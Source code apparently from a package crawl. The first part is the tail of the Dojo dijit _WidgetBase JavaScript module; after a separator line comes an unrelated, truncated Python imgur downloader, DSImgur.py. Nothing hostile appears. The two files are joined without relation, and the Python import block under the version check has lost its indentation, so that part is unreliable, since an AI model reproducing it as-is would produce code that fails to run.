    for(key in obj){
        names[key.toLowerCase()] = true;
    }
    return names;
}
// Returns a setter that mirrors the widget attribute `attr` onto
// this.domNode: the DOM attribute is set when the new value is truthy and
// removed otherwise. The new value is then recorded on the widget.
function nonEmptyAttrToDom(attr){
    return function(value){
        if(value){
            domAttr.set(this.domNode, attr, value);
        }else{
            domAttr.remove(this.domNode, attr, value);
        }
        this._set(attr, value);
    };
}
return declare("dijit._WidgetBase", Stateful, {
// summary:
// Future base class for all Dijit widgets.
// description:
// Future base class for all Dijit widgets.
// _Widget extends this class adding support for various features needed by desktop.
//
// Provides stubs for widget lifecycle methods for subclasses to extend, like postMixInProperties(), buildRendering(),
// postCreate(), startup(), and destroy(), and also public API methods like set(), get(), and watch().
//
// Widgets can provide custom setters/getters for widget attributes, which are called automatically by set(name, value).
// For an attribute XXX, define methods _setXXXAttr() and/or _getXXXAttr().
//
// _setXXXAttr can also be a string/hash/array mapping from a widget attribute XXX to the widget's DOMNodes:
//
// - DOM node attribute
// | _setFocusAttr: {node: "focusNode", type: "attribute"}
// | _setFocusAttr: "focusNode" (shorthand)
// | _setFocusAttr: "" (shorthand, maps to this.domNode)
// Maps this.focus to this.focusNode.focus, or (last example) this.domNode.focus
//
// - DOM node innerHTML
// | _setTitleAttr: { node: "titleNode", type: "innerHTML" }
// Maps this.title to this.titleNode.innerHTML
//
// - DOM node innerText
// | _setTitleAttr: { node: "titleNode", type: "innerText" }
// Maps this.title to this.titleNode.innerText
//
// - DOM node CSS class
// | _setMyClassAttr: { node: "domNode", type: "class" }
// Maps this.myClass to this.domNode.className
//
// If the value of _setXXXAttr is an array, then each element in the array matches one of the
// formats of the above list.
//
// If the custom setter is null, no action is performed other than saving the new value
// in the widget (in this).
//
// If no custom setter is defined for an attribute, then it will be copied
// to this.focusNode (if the widget defines a focusNode), or this.domNode otherwise.
// That's only done though for attributes that match DOMNode attributes (title,
// alt, aria-labelledby, etc.)
// id: [const] String
//      A unique, opaque ID string that can be assigned by users or by the
//      system. If the developer passes an ID which is known not to be
//      unique, the specified ID is ignored and the system-generated ID is
//      used instead.
id: "",
_setIdAttr: "domNode", // to copy to this.domNode even for auto-generated id's

// lang: [const] String
//      Rarely used. Overrides the default Dojo locale used to render this widget,
//      as defined by the [HTML LANG](http://www.w3.org/TR/html401/struct/dirlang.html#adef-lang) attribute.
//      Value must be among the list of locales specified during the Dojo bootstrap,
//      formatted according to [RFC 3066](http://www.ietf.org/rfc/rfc3066.txt) (like en-us).
lang: "",
// set on domNode even when there's a focus node. but don't set lang="", since that's invalid.
_setLangAttr: nonEmptyAttrToDom("lang"),

// dir: [const] String
//      Bi-directional support, as defined by the [HTML DIR](http://www.w3.org/TR/html401/struct/dirlang.html#adef-dir)
//      attribute. Either left-to-right "ltr" or right-to-left "rtl". If undefined, the widget renders
//      in the page's default direction.
dir: "",
// set on domNode even when there's a focus node. but don't set dir="", since that's invalid.
_setDirAttr: nonEmptyAttrToDom("dir"), // to set on domNode even when there's a focus node

// textDir: String
//      Bi-directional support: the main variable which is responsible for the direction of the text.
//      The text direction can be different than the GUI direction by using this parameter in creation
//      of a widget.
//      Allowed values:
//      1. "ltr"
//      2. "rtl"
//      3. "auto" - contextual: the direction of the text is determined by its first strong
//         directional character.
//      By default is as the page direction.
textDir: "",

// class: String
//      HTML class attribute
"class": "",
_setClassAttr: { node: "domNode", type: "class" },

// style: String||Object
//      HTML style attributes as cssText string or name/value hash
style: "",

// title: String
//      HTML title attribute.
//
//      For form widgets this specifies a tooltip to display when hovering over
//      the widget (just like the native HTML title attribute).
//
//      For TitlePane or for when this widget is a child of a TabContainer, AccordionContainer,
//      etc., it's used to specify the tab label, accordion pane title, etc.
title: "",

// tooltip: String
//      When this widget's title attribute is used to for a tab label, accordion pane title, etc.,
//      this specifies the tooltip to appear when the mouse is hovered over that text.
tooltip: "",

// baseClass: [protected] String
//      Root CSS class of the widget (ex: dijitTextBox), used to construct CSS classes to indicate
//      widget state.
baseClass: "",

// srcNodeRef: [readonly] DomNode
//      pointer to original DOM node
srcNodeRef: null,

// domNode: [readonly] DomNode
//      This is our visible representation of the widget! Other DOM
//      Nodes may by assigned to other properties, usually through the
//      template system's data-dojo-attach-point syntax, but the domNode
//      property is the canonical "top level" node in widget UI.
domNode: null,

// containerNode: [readonly] DomNode
//      Designates where children of the source DOM node will be placed.
//      "Children" in this case refers to both DOM nodes and widgets.
//      For example, for myWidget:
//
//      | <div data-dojo-type=myWidget>
//      |       <b> here's a plain DOM node
//      |       <span data-dojo-type=subWidget>and a widget</span>
//      |       <i> and another plain DOM node </i>
//      | </div>
//
//      containerNode would point to:
//
//      |       <b> here's a plain DOM node
//      |       <span data-dojo-type=subWidget>and a widget</span>
//      |       <i> and another plain DOM node </i>
//
//      In templated widgets, "containerNode" is set via a
//      data-dojo-attach-point assignment.
//
//      containerNode must be defined for any widget that accepts innerHTML
//      (like ContentPane or BorderContainer or even Button), and conversely
//      is null for widgets that don't, like TextBox.
containerNode: null,

/*=====
// _started: Boolean
//      startup() has completed.
_started: false,
=====*/

// attributeMap: [protected] Object
//      Deprecated. Instead of attributeMap, widget should have a _setXXXAttr attribute
//      for each XXX attribute to be mapped to the DOM.
//
//      attributeMap sets up a "binding" between attributes (aka properties)
//      of the widget and the widget's DOM.
//      Changes to widget attributes listed in attributeMap will be
//      reflected into the DOM.
//
//      For example, calling set('title', 'hello')
//      on a TitlePane will automatically cause the TitlePane's DOM to update
//      with the new title.
//
//      attributeMap is a hash where the key is an attribute of the widget,
//      and the value reflects a binding to a:
//
//      - DOM node attribute
// |            focus: {node: "focusNode", type: "attribute"}
//      Maps this.focus to this.focusNode.focus
//
//      - DOM node innerHTML
// |            title: { node: "titleNode", type: "innerHTML" }
//      Maps this.title to this.titleNode.innerHTML
//
//      - DOM node innerText
// |            title: { node: "titleNode", type: "innerText" }
//      Maps this.title to this.titleNode.innerText
//
//      - DOM node CSS class
// |            myClass: { node: "domNode", type: "class" }
//      Maps this.myClass to this.domNode.className
//
//      If the value is an array, then each element in the array matches one of the
//      formats of the above list.
//
//      There are also some shorthands for backwards compatibility:
//      - string --> { node: string, type: "attribute" }, for example:
// |    "focusNode" ---> { node: "focusNode", type: "attribute" }
//      - "" --> { node: "domNode", type: "attribute" }
attributeMap: {},

// _blankGif: [protected] String
//      Path to a blank 1x1 image.
//      Used by <img> nodes in templates that really get their image via CSS background-image.
_blankGif: config.blankGif || require.toUrl("dojo/resources/blank.gif"),
//////////// INITIALIZATION METHODS ///////////////////////////////////////
postscript: function(/*Object?*/params, /*DomNode|String*/srcNodeRef){
    // summary:
    //      Kicks off widget instantiation; called automatically by dojo.declare
    //      after the constructor chain runs. See create() for details.
    // tags:
    //      private
    this.create(params, srcNodeRef);
},

create: function(/*Object?*/params, /*DomNode|String?*/srcNodeRef){
    // summary:
    //      Kick off the life-cycle of a widget
    // params:
    //      Hash of initialization parameters for widget, including
    //      scalar values (like title, duration etc.) and functions,
    //      typically callbacks like onClick.
    // srcNodeRef:
    //      If a srcNodeRef (DOM node) is specified:
    //      - use srcNodeRef.innerHTML as my contents
    //      - if this is a behavioral widget then apply behavior
    //        to that srcNodeRef
    //      - otherwise, replace srcNodeRef with my generated DOM
    //        tree
    // description:
    //      Create calls a number of widget methods (postMixInProperties, buildRendering, postCreate,
    //      etc.), some of which of you'll want to override. See http://dojotoolkit.org/reference-guide/dijit/_WidgetBase.html
    //      for a discussion of the widget creation lifecycle.
    //
    //      Of course, adventurous developers could override create entirely, but this should
    //      only be done as a last resort.
    // tags:
    //      private

    // store pointer to original DOM tree
    this.srcNodeRef = dom.byId(srcNodeRef);

    // For garbage collection. An array of listener handles returned by this.connect() / this.subscribe()
    this._connects = [];

    // For widgets internal to this widget, invisible to calling code
    this._supportingWidgets = [];

    // this is here for back-compat, remove in 2.0 (but check NodeList-instantiate.html test)
    if(this.srcNodeRef && (typeof this.srcNodeRef.id == "string")){ this.id = this.srcNodeRef.id; }

    // mix in our passed parameters
    if(params){
        this.params = params;
        lang.mixin(this, params);
    }
    this.postMixInProperties();

    // generate an id for the widget if one wasn't specified
    // (be sure to do this before buildRendering() because that function might
    // expect the id to be there.)
    if(!this.id){
        this.id = registry.getUniqueId(this.declaredClass.replace(/\./g,"_"));
    }
    registry.add(this);

    this.buildRendering();

    if(this.domNode){
        // Copy attributes listed in attributeMap into the [newly created] DOM for the widget.
        // Also calls custom setters for all attributes with custom setters.
        this._applyAttributes();

        // If srcNodeRef was specified, then swap out original srcNode for this widget's DOM tree.
        // For 2.0, move this after postCreate(). postCreate() shouldn't depend on the
        // widget being attached to the DOM since it isn't when a widget is created programmatically like
        // new MyWidget({}). See #11635.
        var source = this.srcNodeRef;
        if(source && source.parentNode && this.domNode !== source){
            source.parentNode.replaceChild(this.domNode, source);
        }
    }

    if(this.domNode){
        // Note: for 2.0 may want to rename widgetId to dojo._scopeName + "_widgetId",
        // assuming that dojo._scopeName even exists in 2.0
        this.domNode.setAttribute("widgetId", this.id);
    }
    this.postCreate();

    // If srcNodeRef has been processed and removed from the DOM (e.g. TemplatedWidget) then delete it to allow GC.
    if(this.srcNodeRef && !this.srcNodeRef.parentNode){
        delete this.srcNodeRef;
    }

    this._created = true;
},

_applyAttributes: function(){
    // summary:
    //      Step during widget creation to copy widget attributes to the
    //      DOM according to attributeMap and _setXXXAttr objects, and also to call
    //      custom _setXXXAttr() methods.
    //
    //      Skips over blank/false attribute values, unless they were explicitly specified
    //      as parameters to the widget, since those are the default anyway,
    //      and setting tabIndex="" is different than not setting tabIndex at all.
    //
    //      For backwards-compatibility reasons attributeMap overrides _setXXXAttr when
    //      _setXXXAttr is a hash/string/array, but _setXXXAttr as a functions override attributeMap.
    // tags:
    //      private

    // Get list of attributes where this.set(name, value) will do something beyond
    // setting this[name] = value. Specifically, attributes that have:
    //      - associated _setXXXAttr() method/hash/string/array
    //      - entries in attributeMap.
    // The list is computed once per class and cached on the constructor.
    var ctor = this.constructor,
        list = ctor._setterAttrs;
    if(!list){
        list = (ctor._setterAttrs = []);
        for(var attr in this.attributeMap){
            list.push(attr);
        }

        var proto = ctor.prototype;
        for(var fxName in proto){
            if(fxName in this.attributeMap){ continue; }
            // Converts a property name to its setter name, ex: value --> _setValueAttr
            var setterName = "_set" + fxName.replace(/^[a-z]|-[a-zA-Z]/g, function(c){ return c.charAt(c.length-1).toUpperCase(); }) + "Attr";
            if(setterName in proto){
                list.push(fxName);
            }
        }
    }

    // Call this.set() for each attribute that was either specified as parameter to constructor,
    // or was found above and has a default non-null value. For correlated attributes like value and displayedValue, the one
    // specified as a parameter should take precedence, so apply attributes in this.params last.
    // Particularly important for new DateTextBox({displayedValue: ...}) since DateTextBox's default value is
    // NaN and thus is not ignored like a default value of "".
    array.forEach(list, function(attr){
        if(this.params && attr in this.params){
            // skip this one, do it below
        }else if(this[attr]){
            this.set(attr, this[attr]);
        }
    }, this);
    for(var param in this.params){
        this.set(param, this[param]);
    }
},

postMixInProperties: function(){
    // summary:
    //      Called after the parameters to the widget have been read-in,
    //      but before the widget template is instantiated. Especially
    //      useful to set properties that are referenced in the widget
    //      template. Stub for subclasses to override.
    // tags:
    //      protected
},
buildRendering: function(){
// summary:
// Construct the UI for this widget, setting this.domNode.
// Most widgets will mixin `dijit._TemplatedMixin`, which implements this method.
// tags:
// protected
if(!this.domNode){
// Create root node if it wasn't created by _Templated
this.domNode = this.srcNodeRef || domConstruct.create('div');
}
// baseClass is a single class name or occasionally a space-separated list of names.
// Add those classes to the DOMNode. If RTL mode then also add with Rtl suffix.
// TODO: make baseClass custom setter
if(this.baseClass){
var classes = this.baseClass.split(" ");
if(!this.isLeftToRight()){
classes = classes.concat( array.map(classes, function(name){ return name+"Rtl"; }));
}
domClass.add(this.domNode, classes);
}
},
postCreate: function(){
    // summary:
    //      Processing after the DOM fragment is created. Stub for
    //      subclasses to override.
    // description:
    //      Called after the DOM fragment has been created, but not necessarily
    //      added to the document. Do not include any operations which rely on
    //      node dimensions or placement.
    // tags:
    //      protected
},
startup: function(){
// summary:
// Processing after the DOM fragment is added to the document
// description:
// Called after a widget and its children have been created and added to the page,
// and all related widgets have finished their create() cycle, up through postCreate().
// This is useful for composite widgets that need to control or layout sub-widgets.
// Many layout widgets can use this as a wiring phase.
if(this._started){ return; }
this._started = true;
array.forEach(this.getChildren(), function(obj){
if(!obj._started && !obj._destroyed && lang.isFunction(obj.startup)){
obj.startup();
obj._started = true;
}
});
},
//////////// DESTROY FUNCTIONS ////////////////////////////////

destroyRecursive: function(/*Boolean?*/ preserveDom){
    // summary:
    //      Destroy this widget and its descendants
    // description:
    //      This is the generic "destructor" function that all widget users
    //      should call to cleanly discard with a widget. Once a widget is
    //      destroyed, it is removed from the manager object.
    //      Descendants are destroyed first, then this widget itself.
    // preserveDom:
    //      If true, this method will leave the original DOM structure
    //      alone of descendant Widgets. Note: This will NOT work with
    //      dijit._Templated widgets.

    this._beingDestroyed = true;
    this.destroyDescendants(preserveDom);
    this.destroy(preserveDom);
},
destroy: function(/*Boolean*/ preserveDom){
// summary:
// Destroy this widget, but not its descendants.
// This method will, however, destroy internal widgets such as those used within a template.
// preserveDom: Boolean
// If true, this method will leave the original DOM structure alone.
// Note: This will not yet work with _Templated widgets
this._beingDestroyed = true;
this.uninitialize();
// remove this.connect() and this.subscribe() listeners
var c;
while(c = this._connects.pop()){
c.remove();
}
// destroy widgets created as part of template, etc.
var w;
while(w = this._supportingWidgets.pop()){
if(w.destroyRecursive){
w.destroyRecursive();
}else if(w.destroy){
w.destroy();
}
}
this.destroyRendering(preserveDom);
registry.remove(this.id);
this._destroyed = true;
},
destroyRendering: function(/*Boolean?*/ preserveDom){
// summary:
// Destroys the DOM nodes associated with this widget
// preserveDom:
// If true, this method will leave the original DOM structure alone
// during tear-down. Note: this will not work with _Templated
// widgets yet.
// tags:
// protected
if(this.bgIframe){
this.bgIframe.destroy(preserveDom);
delete this.bgIframe;
}
if(this.domNode){
if(preserveDom){
domAttr.remove(this.domNode, "widgetId");
}else{
domConstruct.destroy(this.domNode);
}
delete this.domNode;
}
if(this.srcNodeRef){
if(!preserveDom){
domConstruct.destroy(this.srcNodeRef);
}
delete this.srcNodeRef;
}
},
destroyDescendants: function(/*Boolean?*/ preserveDom){
    // summary:
    //      Recursively destroy the children of this widget and their
    //      descendants.
    // preserveDom:
    //      If true, the preserveDom attribute is passed to all descendant
    //      widget's .destroy() method. Not for use with _Templated
    //      widgets.

    // get all direct descendants and destroy them recursively
    array.forEach(this.getChildren(), function(widget){
        if(widget.destroyRecursive){
            widget.destroyRecursive(preserveDom);
        }
    });
},

uninitialize: function(){
    // summary:
    //      Stub function. Override to implement custom widget tear-down
    //      behavior. Called from destroy() before listeners and rendering
    //      are torn down.
    // tags:
    //      protected
    return false;
},
////////////////// GET/SET, CUSTOM SETTERS, ETC. ///////////////////
_setStyleAttr: function(/*String||Object*/ value){
// summary:
// Sets the style attribute of the widget according to value,
// which is either a hash like {height: "5px", width: "3px"}
// or a plain string
// description:
// Determines which node to set the style on based on style setting
// in attributeMap.
// tags:
// protected
var mapNode = this.domNode;
// Note: technically we should revert any style setting made in a previous call
// to his method, but that's difficult to keep track of.
if(lang.isObject(value)){
domStyle.set(mapNode, value);
}else{
if(mapNode.style.cssText){
mapNode.style.cssText += "; " + value;
}else{
mapNode.style.cssText = value;
}
}
this._set("style", value);
},
_attrToDom: function(/*String*/ attr, /*String*/ value, /*Object?*/ commands){
    // summary:
    //      Reflect a widget attribute (title, tabIndex, duration etc.) to
    //      the widget DOM, as specified by commands parameter.
    //      If commands isn't specified then it's looked up from attributeMap.
    //      Note some attributes like "type"
    //      cannot be processed this way as they are not mutable.
    // commands:
    //      A command object (or array of them) with optional `node`
    //      (attach-point name, default "domNode") and `type` (one of
    //      "attribute", "innerHTML", "innerText", "class").
    // tags:
    //      private
    commands = arguments.length >= 3 ? commands : this.attributeMap[attr];

    array.forEach(lang.isArray(commands) ? commands : [commands], function(command){

        // Get target node and what we are doing to that node
        var mapNode = this[command.node || command || "domNode"]; // DOM node
        var type = command.type || "attribute"; // class, innerHTML, innerText, or attribute

        switch(type){
            case "attribute":
                if(lang.isFunction(value)){ // functions execute in the context of the widget
                    value = lang.hitch(this, value);
                }

                // Get the name of the DOM node attribute; usually it's the same
                // as the name of the attribute in the widget (attr), but can be overridden.
                // Also maps handler names to lowercase, like onSubmit --> onsubmit
                var attrName = command.attribute ? command.attribute :
                    (/^on[A-Z][a-zA-Z]*$/.test(attr) ? attr.toLowerCase() : attr);

                domAttr.set(mapNode, attrName, value);
                break;
            case "innerText":
                // Clear then append a text node, so markup in value is not interpreted
                mapNode.innerHTML = "";
                mapNode.appendChild(win.doc.createTextNode(value));
                break;
            case "innerHTML":
                mapNode.innerHTML = value;
                break;
            case "class":
                // Replace the previous value of this widget attribute with the new one
                domClass.replace(mapNode, value, this[attr]);
                break;
        }
    }, this);
},
get: function(name){
// summary:
// Get a property from a widget.
// name:
// The property to get.
// description:
// Get a named property from a widget. The property may
// potentially be retrieved via a getter method. If no getter is defined, this
// just retrieves the object's property.
//
// For example, if the widget has properties `foo` and `bar`
// and a method named `_getFooAttr()`, calling:
// `myWidget.get("foo")` would be equivalent to calling
// `widget._getFooAttr()` and `myWidget.get("bar")`
// would be equivalent to the expression
// `widget.bar2`
var names = this._getAttrNames(name);
return this[names.g] ? this[names.g]() : this[name];
},
set: function(name, value){
    // summary:
    //      Set a property on a widget
    // name:
    //      The property to set.
    // value:
    //      The value to set in the property.
    // description:
    //      Sets named properties on a widget which may potentially be handled by a
    //      setter in the widget.
    //
    //      For example, if the widget has properties `foo` and `bar`
    //      and a method named `_setFooAttr()`, calling
    //      `myWidget.set("foo", "Howdy!")` would be equivalent to calling
    //      `widget._setFooAttr("Howdy!")` and `myWidget.set("bar", 3)`
    //      would be equivalent to the statement `widget.bar = 3;`
    //
    //      set() may also be called with a hash of name/value pairs, ex:
    //
    //      |       myWidget.set({
    //      |               foo: "Howdy",
    //      |               bar: 3
    //      |       });
    //
    //      This is equivalent to calling `set(foo, "Howdy")` and `set(bar, 3)`

    if(typeof name === "object"){
        for(var x in name){
            this.set(x, name[x]);
        }
        return this;
    }
    var names = this._getAttrNames(name),
        setter = this[names.s];
    if(lang.isFunction(setter)){
        // use the explicit setter
        var result = setter.apply(this, Array.prototype.slice.call(arguments, 1));
    }else{
        // Mapping from widget attribute to DOMNode attribute/value/etc.
        // Map according to:
        //      1. attributeMap setting, if one exists (TODO: attributeMap deprecated, remove in 2.0)
        //      2. _setFooAttr: {...} type attribute in the widget (if one exists)
        //      3. apply to focusNode or domNode if standard attribute name, excluding funcs like onClick.
        // Checks if an attribute is a "standard attribute" by whether the DOMNode JS object has a similar
        // attribute name (ex: accept-charset attribute matches jsObject.acceptCharset).
        // Note also that Tree.focusNode() is a function not a DOMNode, so test for that.
        var defaultNode = this.focusNode && !lang.isFunction(this.focusNode) ? "focusNode" : "domNode",
            tag = this[defaultNode].tagName,
            attrsForTag = tagAttrs[tag] || (tagAttrs[tag] = getAttrs(this[defaultNode])),
            map = name in this.attributeMap ? this.attributeMap[name] :
                names.s in this ? this[names.s] :
                ((names.l in attrsForTag && typeof value != "function") ||
                    /^aria-|^data-|^role$/.test(name)) ? defaultNode : null;
        if(map != null){
            this._attrToDom(name, value, map);
        }
        this._set(name, value);
    }
    // `result` is undefined unless a custom setter ran and returned a value
    return result || this;       // non-null to allow chaining
},

_attrPairNames: {}, // shared between all widgets

_getAttrNames: function(name){
    // summary:
    //      Helper function for get() and set().
    //      Caches attribute name values so we don't do the string ops every time.
    // returns:
    //      Hash with the derived names: s = setter, g = getter,
    //      n = attach-point node name, l = lowercase name without dashes.
    // tags:
    //      private

    var apn = this._attrPairNames;
    if(apn[name]){ return apn[name]; }
    var uc = name.replace(/^[a-z]|-[a-zA-Z]/g, function(c){ return c.charAt(c.length-1).toUpperCase(); });
    return (apn[name] = {
        n: name+"Node",
        s: "_set"+uc+"Attr", // converts dashes to camel case, ex: accept-charset --> _setAcceptCharsetAttr
        g: "_get"+uc+"Attr",
        l: uc.toLowerCase() // lowercase name w/out dashes, ex: acceptcharset
    });
},
_set: function(/*String*/ name, /*anything*/ value){
// summary:
// Helper function to set new value for specified attribute, and call handlers
// registered with watch() if the value has changed.
var oldValue = this[name];
this[name] = value;
if(this._watchCallbacks && this._created && value !== oldValue){
this._watchCallbacks(name, oldValue, value);
}
},
on: function(/*String*/ type, /*Function*/ func){
    // summary:
    //      Call specified function when event occurs, ex: myWidget.on("click", function(){ ... }).
    // description:
    //      Call specified function when event `type` occurs, ex: `myWidget.on("click", function(){ ... })`.
    //      Note that the function is not run in any particular scope, so if (for example) you want it to run in the
    //      widget's scope you must do `myWidget.on("click", lang.hitch(myWidget, func))`.
    // returns:
    //      A handle with a remove() method, from aspect.after().
    return aspect.after(this, this._onMap(type), func, true);
},
_onMap: function(/*String*/ type){
// summary:
// Maps on() type parameter (ex: "mousemove") to method name (ex: "onMouseMove")
var ctor = this.constructor, map = ctor._onMap;
if(!map){
map = (ctor._onMap = {});
for(var attr in ctor.prototype){
if(/^on/.test(attr)){
map[attr.replace(/^on/, "").toLowerCase()] = attr;
}
}
}
return map[type.toLowerCase()]; // String
},
toString: function(){
// summary:
// Returns a string that represents the widget
// description:
// When a widget is cast to a string, this method will be used to generate the
// output. Currently, it does not implement any sort of reversible
// serialization.
return '[Widget ' + this.declaredClass + ', ' + (this.id || 'NO ID') + ']'; // String
},
getChildren: function(){
// summary:
// Returns all the widgets contained by this, i.e., all widgets underneath this.containerNode.
// Does not return nested widgets, nor widgets that are part of this widget's template.
return this.containerNode ? registry.findWidgets(this.containerNode) : []; // dijit._Widget[]
},
getParent: function(){
    // summary:
    //      Returns the parent widget of this widget, i.e. the closest
    //      enclosing widget of this widget's domNode.
    return registry.getEnclosingWidget(this.domNode.parentNode);
},

connect: function(
        /*Object|null*/ obj,
        /*String|Function*/ event,
        /*String|Function*/ method){
    // summary:
    //      Connects specified obj/event to specified method of this object
    //      and registers for disconnect() on widget destroy.
    // description:
    //      Provide widget-specific analog to dojo.connect, except with the
    //      implicit use of this widget as the target object.
    //      Events connected with `this.connect` are disconnected upon
    //      destruction.
    // returns:
    //      A handle that can be passed to `disconnect` in order to disconnect before
    //      the widget is destroyed.
    // example:
    //      |       var btn = new dijit.form.Button();
    //      |       // when foo.bar() is called, call the listener we're going to
    //      |       // provide in the scope of btn
    //      |       btn.connect(foo, "bar", function(){
    //      |               console.debug(this.toString());
    //      |       });
    // tags:
    //      protected

    // Handle is remembered in _connects so destroy() can clean it up.
    var handle = connect.connect(obj, event, this, method);
    this._connects.push(handle);
    return handle; // _Widget.Handle
},
disconnect: function(handle){
// summary:
// Disconnects handle created by `connect`.
// Also removes handle from this widget's list of connects.
// tags:
// protected
var i = array.indexOf(this._connects, handle);
if(i != -1){
handle.remove();
this._connects.splice(i, 1);
}
},
subscribe: function(t, method){
// summary:
// Subscribes to the specified topic and calls the specified method
// of this object and registers for unsubscribe() on widget destroy.
// description:
// Provide widget-specific analog to dojo.subscribe, except with the
// implicit use of this widget as the target object.
// t: String
// The topic
// method: Function
// The callback
// example:
// | var btn = new dijit.form.Button();
// | // when /my/topic is published, this button changes its label to
// | // be the parameter of the topic.
// | btn.subscribe("/my/topic", function(v){
// | this.set("label", v);
// | });
// tags:
// protected
var handle = topic.subscribe(t, lang.hitch(this, method));
this._connects.push(handle);
return handle; // _Widget.Handle
},
unsubscribe: function(/*Object*/ handle){
// summary:
// Unsubscribes handle created by this.subscribe.
// Also removes handle from this widget's list of subscriptions
// tags:
// protected
this.disconnect(handle);
},
isLeftToRight: function(){
// summary:
// Return this widget's explicit or implicit orientation (true for LTR, false for RTL)
// tags:
// protected
return this.dir ? (this.dir == "ltr") : domGeometry.isBodyLtr(); //Boolean
},
isFocusable: function(){
// summary:
// Return true if this widget can currently be focused
// and false if not
return this.focus && (domStyle.get(this.domNode, "display") != "none");
},
placeAt: function(/* String|DomNode|_Widget */reference, /* String?|Int? */position){
// summary:
// Place this widget's domNode reference somewhere in the DOM based
// on standard domConstruct.place conventions, or passing a Widget reference that
// contains and addChild member.
//
// description:
// A convenience function provided in all _Widgets, providing a simple
// shorthand mechanism to put an existing (or newly created) Widget
// somewhere in the dom, and allow chaining.
//
// reference:
// The String id of a domNode, a domNode reference, or a reference to a Widget possessing
// an addChild method.
//
// position:
// If passed a string or domNode reference, the position argument
// accepts a string just as domConstruct.place does, one of: "first", "last",
// "before", or "after".
//
// If passed a _Widget reference, and that widget reference has an ".addChild" method,
// it will be called passing this widget instance into that method, supplying the optional
// position index passed.
//
// returns:
// dijit._Widget
// Provides a useful return of the newly created dijit._Widget instance so you
// can "chain" this function by instantiating, placing, then saving the return value
// to a variable.
//
// example:
// | // create a Button with no srcNodeRef, and place it in the body:
// | var button = new dijit.form.Button({ label:"click" }).placeAt(win.body());
// | // now, 'button' is still the widget reference to the newly created button
// | button.on("click", function(e){ console.log('click'); }));
//
// example:
// | // create a button out of a node with id="src" and append it to id="wrapper":
// | var button = new dijit.form.Button({},"src").placeAt("wrapper");
//
// example:
// | // place a new button as the first element of some div
// | var button = new dijit.form.Button({ label:"click" }).placeAt("wrapper","first");
//
// example:
// | // create a contentpane and add it to a TabContainer
// | var tc = dijit.byId("myTabs");
// | new dijit.layout.ContentPane({ href:"foo.html", title:"Wow!" }).placeAt(tc)
if(reference.declaredClass && reference.addChild){
reference.addChild(this, position);
}else{
domConstruct.place(this.domNode, reference, position);
}
return this;
},
getTextDir: function(/*String*/ text,/*String*/ originalDir){
// summary:
// Return direction of the text.
// The function overridden in the _BidiSupport module,
// its main purpose is to calculate the direction of the
// text, if was defined by the programmer through textDir.
// tags:
// protected.
return originalDir;
},
applyTextDir: function(/*===== element, text =====*/){
// summary:
//		The function overridden in the _BidiSupport module,
//		originally used for setting element.dir according to this.textDir.
//		In this case does nothing.
// element: DOMNode
// text: String
// tags:
//		protected.
// NOTE: intentionally an empty no-op in the base class; _BidiSupport
// supplies the real implementation when bidi support is loaded.
}
});
}); | PypiClean |
/DSImgur-1.0.0.2.tar.gz/DSImgur-1.0.0.2/src/DSImgur.py | import sys
import argparse
import re
import urlparse
import json
if sys.version_info[0] == 2:
import urllib
else:
import urllib.request as urllib
# https://github.com/DiSiqueira/DSDownload
from DSDownload import DSDownload
class DSImgur:
    """Collects imgur URLs (profiles, albums, galleries, single or direct
    images), turns them into direct download jobs and feeds them to
    DSDownload.
    """

    # AJAX endpoint listing a profile's uploaded images, 60 per page.
    profile_link = 'https://{subdomain}.imgur.com/ajax/images?sort=0&order=1&album=0&page={page}&perPage=60'
    # Profile front page; scraped for album ids.
    albums_link = 'https://{subdomain}.imgur.com/'

    def __init__(self, workers, folderPath, protocol = 'https://'):
        """workers: parallel download count; folderPath: destination root;
        protocol: scheme used when rebuilding imgur links."""
        self._urlList = []           # raw URLs waiting to be classified
        self._workers = workers
        self._folderPath = folderPath
        self.dlList = []             # queued jobs: [{'url': ..., 'folder': ...}]
        self._protocol = protocol

    def addUrl(self, url, folder = ''):
        """Queue a URL (or list of URLs) and classify it immediately.

        folder: sub-folder (relative to folderPath) for the resulting files.
        """
        if type(url) is list:  # kept as-is: non-list iterables count as one URL
            self._urlList += url
        else:
            self._urlList.append(url)
        self._prepareUrlList(folder)

    def _findProfileInUrl(self, url, search, delimiter, index):
        """Split *url* on *delimiter*; when *search* is one of the parts,
        take the part *index* positions away as a profile name and queue
        that whole profile.

        Returns False when no plausible profile name is found (parts
        shorter than 4 characters are rejected), otherwise the result of
        _prepareProfile().
        """
        parts = url.split(delimiter)
        if search not in parts:
            return False
        profile = parts[parts.index(search) + index]
        if len(profile) < 4:
            return False
        return self._prepareProfile(profile)

    def _prepareUrlList(self, folder):
        """Classify each queued URL and queue its download links.

        Recognised shapes (checked in this order): profile subdomains,
        /user/ and /account/ pages, albums/galleries, direct image files,
        single-image pages. The raw queue is cleared afterwards.
        """
        # Raw strings fix the invalid-escape warnings the old plain
        # string patterns produced; the regexes themselves are unchanged.
        album = re.compile(r'(\/)(gallery\/|a\/)(\w{5}?)')
        single = re.compile(r'(\/[a-zA-Z\d]+)(\/)?')
        direct = re.compile(r'(\/[a-zA-Z\d]+)(\.\w{3,4})')
        for url in self._urlList:
            parse = urlparse.urlparse(url)
            # Anything that is not an imgur link is junk.
            if parse.netloc.find('imgur.com') < 0:
                continue
            # https://someprofile.imgur.com/*
            if self._findProfileInUrl(parse.netloc, 'imgur', '.', -1):
                continue
            # https://imgur.com/user/<name>/*
            if self._findProfileInUrl(url, 'user', '/', 1):
                continue
            # https://imgur.com/account/<name>/*
            if self._findProfileInUrl(url, 'account', '/', 1):
                continue
            # https://imgur.com/a/5xK6z or https://imgur.com/gallery/5xK6z
            if album.search(parse.path):
                self._prepareAlbum(parse.path, folder)
                continue
            # http://i.imgur.com/BoENDec.jpg
            if direct.search(parse.path):
                self._prepareDirect(parse.path, folder)
                continue
            # https://imgur.com/WDn2pnD
            if single.search(parse.path):
                self._prepareSingle(parse.path, folder)
                continue
        self._urlList = []

    def _getProfileImages(self, subdomain, page):
        """Fetch one page (60 entries) of a profile's image metadata.

        Returns the decoded JSON dict, or False on bad/unexpected replies.
        """
        url = self.profile_link.replace('{subdomain}', subdomain)
        url = url.replace('{page}', str(page))
        content = urllib.urlopen(url)
        try:
            result = json.load(content)
        except ValueError:
            # Not JSON. (Fixed: the old ``except ValueError, e`` form is a
            # SyntaxError on Python 3.)
            return False
        if type(result) is not dict:
            return False
        if result['status'] != 200:
            return False
        return result

    def _getProfileAlbums(self, subdomain):
        """Scrape the profile front page and return the list of album ids."""
        url = self.albums_link.replace('{subdomain}', subdomain)
